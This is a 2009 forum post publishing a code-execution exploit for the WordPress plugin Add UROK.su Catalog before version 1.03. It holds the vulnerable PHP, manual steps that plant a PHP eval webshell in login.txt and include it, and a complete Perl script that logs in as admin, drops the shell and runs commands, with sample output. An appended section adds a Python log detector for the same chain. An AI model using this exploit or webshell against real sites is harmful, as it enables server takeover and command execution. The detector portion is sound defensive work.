
15.07.2009, 19:54
Regular member
Registered: 15.06.2008
Posts: 941
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
requires the admin's login:password
Code:
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
------------
http://wordpress.org/extend/plugins/add-uroksu-catalog/
Add UROK.su Catalog
Version: 1.03
------------
\wp-content\plugins\add-uroksu-catalog\urok.su.class.php, lines 56-64:
----------------------------------------------------------------------
if (isset($_POST['UPDATE'])) {
    $MyUROKsu_user=$_REQUEST['login'];
    $file_name=$file_name=dirname(__FILE__).'/login.txt';
    $w=fopen($file_name,'w');
    fwrite($w,$MyUROKsu_user);
    fclose($w);
    print($this->update_catalog($MyUROKsu_user));
    echo '</p>';
}
----------------------------------------------------------------------
Steps to code execution:
1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
POST: UPDATE=.& login=<?php @eval($_GET['c']);?>
(your code will be saved to the file:
/wp-content/plugins/add-uroksu-catalog/login.txt)
2) include this file and the code executes:
/wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
Perl exploit:
----------------------------------------------------------------------
Code:
#!/usr/bin/perl -w
# WP add-uroksu-catalog < 1.03 exploit (eLwaux / uasc, 2009)
# Needs a valid admin login:password. The base URL must end with a slash,
# every request below appends a relative path to it.
use strict;
use warnings;
use LWP::UserAgent;

print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n";
print " eLwaux(c)uasc 2009\n\n";

if (!defined $ARGV[2]) {
    print " usage:\n".
          " expl.pl http://site.com/wp/ adminLogin adminPass\n";
    exit(0);
}
my $mHost = $ARGV[0];
my $mAdmL = $ARGV[1];
my $mAdmP = $ARGV[2];
$mHost .= '/' unless $mHost =~ m{/$};

my $UA = LWP::UserAgent->new;
$UA->timeout(20);
$UA->default_header('Referer' => $mHost.'wp-login.php');
$UA->default_header('Cookie'  => 'wordpress_test_cookie=WP+Cookie+check;');

# login to WP: a successful login answers with a 302 that sets the auth cookies
my $page = $UA->post($mHost.'wp-login.php',
    {
        log         => $mAdmL,
        pwd         => $mAdmP,
        # rememberme => 'forever',
        submit      => 'Войти',   # caption of the login button, ignored by WP
        redirect_to => $mHost.'wp-admin/',
        testcookie  => 1
    }
)->as_string;

# collect every Set-Cookie value into one Cookie header
my $cookie = '';
my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
foreach my $SC (@SetCookie) {
    $cookie .= $SC.';';
}
if (length($cookie) < 100) {
    print ' - bad login:password!'."\n";
    exit(0);
}
print ' - good login:password!'."\n";
$UA->default_header('Cookie' => $cookie);

print ' .. sending exploit..'."\n";
# send EXPLOIT: the plugin writes the 'login' value verbatim into login.txt
$page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
    {
        login  => '<?php @eval($_GET[\'c\']);?>',
        UPDATE => 1
    }
)->as_string;
print ' + exploit send!'."\n";

# try to execute simple code: admin.php?page=... includes login.txt, which evals $_GET['c']
$page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
    print ' + result of test1: '.$1."\n";
    print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
} else {
    print ' - perhaps code is not injected!'."\n";
}
print ' ! FINISH!'."\n\n";
print ' !! your shell:'."\n";
print ' '.$mHost."\n".
      ' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";
exit(0);
Code:
----------------------------------------------------------------------
simple result on localhost:
----------------------------------------------------------------------
> expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
WP ] add-uroksu-catalog < 1.03 [ exploit
eLwaux(c)uasc 2009
- good login:password!
.. sending exploit..
+ exploit send!
+ result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
+ result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
! FINISH!
!! your shell:
http://localhost/cms/wordpress/
wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
----------------------------------------------------------------------
Last edited by eLWAux; 15.07.2009 at 21:38.
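Added example, not part of eLWAux's post or of the plugin: a small Python detector for the chain described above, run over constructed access-log lines. It keys on the two URLs the post gives (the settings page whose `login` value is written into login.txt, and the admin.php?page= request that includes that file) and checks login.txt itself for a PHP open tag. The log format (common log format), the IP addresses and the log lines are assumptions made for the demo. Because UPDATE has to arrive in the POST body while `login` comes from $_REQUEST, the payload is only visible in the log when it travels in the query string; a plain POST to the settings page looks the same as a legitimate settings save, so it is rated "info" and the file on disk decides.

```python
"""Added example (not from the original post): flag the login.txt code-execution
chain from web-server access logs, and check the dropped file itself.

Assumptions: common log format; the two page= values are the ones the post
uses (settings page, and the include of login.txt). Log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

SETTINGS_PAGE = "urok_su_wp/urok_su_wp.php"    # page= the payload is POSTed to
DROP_FILE = "add-uroksu-catalog/login.txt"     # page= that includes the dropped file

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# any PHP open tag in a value that should only ever hold a urok.su user name
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Map one request to an exploit stage as (stage, payload), or None."""
    url = urlsplit(entry["target"])
    q = parse_qs(url.query)
    page = q.get("page", [""])[0]
    if url.path.endswith("/wp-admin/admin.php") and page == DROP_FILE:
        # stage 2: WordPress includes plugins/<page>, so login.txt runs as PHP
        return ("include", q.get("c", [""])[0])
    if url.path.endswith("/wp-content/plugins/" + DROP_FILE):
        # direct read of the dropped file: served as text, not executed
        return ("fetch", "")
    if url.path.endswith("/wp-admin/options-general.php") and page == SETTINGS_PAGE:
        # stage 1: 'login' comes from $_REQUEST, so it may sit in the query string
        login = q.get("login", [""])[0]
        if PHP_TAG_RE.search(login):
            return ("plant-query", login)
        if entry["method"] == "POST":
            return ("plant-post", "")   # body not logged: could be a normal settings save
    return None


def find_chains(log_text):
    """Group exploit-stage requests per client IP and rate each client."""
    by_ip = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        hit = classify(entry)
        if hit:
            by_ip.setdefault(entry["ip"], []).append((entry["ts"], hit[0], hit[1]))
    report = []
    for ip, events in by_ip.items():
        stages = {stage for _, stage, _ in events}
        if stages & {"include", "plant-query"}:
            severity = "high"      # neither request has a legitimate reason to exist
        else:
            severity = "info"      # settings save or file read: verify login.txt on disk
        report.append({"ip": ip, "severity": severity, "events": events})
    return report


def file_is_backdoored(login_txt):
    """True if login.txt holds a PHP open tag instead of a plain user name."""
    return bool(PHP_TAG_RE.search(login_txt))


# constructed sample log: one full chain, one query-string plant, one ordinary admin
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jul/2009:19:54:01 +0300] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [15/Jul/2009:19:54:02 +0300] "POST /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php HTTP/1.1" 200 4312
203.0.113.7 - - [15/Jul/2009:19:54:03 +0300] "GET /wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r(%24_SERVER)%3B HTTP/1.1" 200 2210
198.51.100.9 - - [15/Jul/2009:20:10:11 +0300] "POST /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php&login=%3C%3Fphp+%40eval(%24_GET%5B%27c%27%5D)%3B%3F%3E HTTP/1.1" 200 4300
192.0.2.44 - - [15/Jul/2009:20:30:00 +0300] "POST /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php HTTP/1.1" 200 4100
192.0.2.44 - - [15/Jul/2009:20:30:05 +0300] "GET /wp-content/plugins/add-uroksu-catalog/login.txt HTTP/1.1" 200 12
"""

if __name__ == "__main__":
    for item in find_chains(SAMPLE_LOG):
        print(item["severity"], item["ip"])
        for ts, stage, payload in item["events"]:
            print("   ", ts, stage, payload)
    print("login.txt backdoored:", file_is_backdoored("<?php @eval($_GET['c']);?>"))
```

On a real host, feed the web server's access log to find_chains() and run file_is_backdoored() on wp-content/plugins/add-uroksu-catalog/login.txt; an "info" client with a clean login.txt is just an admin saving settings.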